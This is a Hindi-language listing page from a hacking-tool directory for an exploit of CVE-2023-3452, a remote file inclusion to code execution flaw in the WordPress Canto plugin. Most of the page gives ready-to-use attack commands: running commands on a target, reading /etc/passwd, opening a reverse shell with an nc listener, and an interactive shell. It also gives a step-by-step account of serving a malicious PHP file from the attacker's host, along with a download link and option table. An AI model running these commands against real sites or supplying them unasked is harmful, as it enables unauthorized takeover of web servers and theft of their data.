Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — WordPress Canto प्लगइन के लिए CVE-2023-3452 शोषण, RCE, HTTPS समर्थन शामिल | Kitploit
उपकरण/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

WordPress Canto प्लगइन के लिए CVE-2023-3452 शोषण, RCE, HTTPS समर्थन शामिल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

CVE-2023-3452 - वर्डप्रेस कैंटो प्लगइन आरसीई

वर्डप्रेस कैंटो प्लगइन (≤ 3.0.4) RFI कमजोरी के लिए शोषण। वास्तव में HTTPS पर काम करता है — अन्य सार्वजनिक PoCs ने SSL पर हार मान ली थी।

जहां श्रेय देना उचित है: यह CVE दूसरों द्वारा पाया गया। मैंने सिर्फ एक संस्करण बनाया जो HTTPS लक्ष्यों पर काम करता है।

कमजोरी

CVECVE-2023-3452
EDB-ID51826
प्रकाररिमोट फ़ाइल समावेशन (RFI) → अप्रमाणित RCE
प्रभावितवर्डप्रेस कैंटो प्लगइन < 3.0.5 (≤ 3.0.4)
द्वारा खुलासाLeopoldo Angulo (leoanggal1) — 2024-02-27
स्थान/wp-content/plugins/canto/includes/lib/download.php
वेक्टरwp_abspath का उपयोग बिना किसी सत्यापन के PHP फ़ाइलों को शामिल करने के लिए किया जाता है — हम अपनी फ़ाइल को दूरस्थ रूप से शामिल करते हैं।

यह क्यों?

इस CVE के अधिकांश शोषण HTTPS पर SSL सत्यापन के कारण विफल हो जाते हैं। यह स्क्रिप्ट:

  • HTTPS लक्ष्यों पर काम करने के लिए verify=False का उपयोग करता है
  • urllib3 चेतावनी स्पैम को दबाता है
  • HTTP और HTTPS दोनों पर समान रूप से चलता है — अलग कॉन्फ़िगरेशन की आवश्यकता नहीं

आवश्यकताएँ

  • Python 3.6+
  • requests

स्थापना

root@kitploit:~
pip install -r requirements.txt

या बस: pip install requests

उपयोग

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]

तर्क

* कोई आदेश नहीं = स्वस्थता जांच के रूप में id; whoami; hostname चलाता है

उदाहरण

एकल आदेश:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

फ़ाइल पढ़ना:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

रिवर्स शेल (पहले nc -lvnp 4444 चलाएँ):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

इंटरैक्टिव मोड:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

HTTPS CTF लक्ष्य:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

यह कैसे काम करता है

  1. जांच — /wp-content/plugins/canto/readme.txt पर हिट करता है, संस्करण पार्स करता है (≤ 3.0.4 = कमजोर)
  2. पेलोड — एक नकली wp-admin/admin.php लिखता है जो system() के माध्यम से आपका आदेश चलाता है
  3. सर्वर — एक स्थानीय HTTP सर्वर शुरू करता है ताकि लक्ष्य हमारी फ़ाइल प्राप्त कर सके
  4. ट्रिगर — download.php को wp_abspath=http://LHOST:LPORT के साथ अनुरोध करता है ताकि यह हमारे रिमोट PHP को शामिल करे
  5. निष्पादन — उनका सर्वर हमारा कोड चलाता है, हमें आउटपुट वापस मिलता है

नेटवर्क नोट्स

  • लक्ष्य को LHOST:LPORT पर आपकी मशीन तक पहुंचने में सक्षम होना चाहिए (HTB/लैब के लिए, यह आपका VPN IP है)
  • फ़ायरवॉल को पेलोड पोर्ट (-p) पर इनबाउंड की अनुमति देनी होगी

अस्वीकरण

केवल अधिकृत परीक्षण और शिक्षा। केवल उन सिस्टम को छुएं जिनकी आपको अनुमति है। बाकी सब कुछ अवैध है।

लाइसेंस

MIT

टूल डाउनलोड करें
विकल्पविवरणआवश्यक
-t, --targetलक्ष्य वर्डप्रेस URL (HTTP या HTTPS)हाँ
-l, --lhostआपका IP — पेलोड के लिए लक्ष्य को इस तक पहुंचना होगाहाँ
-p, --lportपेलोड सर्वर पोर्ट (डिफ़ॉल्ट: 8888)नहीं
-c, --commandलक्ष्य पर चलाने का आदेशनहीं*
--revshellरिवर्स शेल उत्पन्न करेंनहीं
--shell-portरिवर्स शेल के लिए श्रोता पोर्ट (डिफ़ॉल्ट: 4444)नहीं
-i, --interactiveइंटरैक्टिव शेल मोडनहीं
-v, --verboseअतिरिक्त आउटपुटनहीं
--skip-checkकमजोरी जांच छोड़ेंनहीं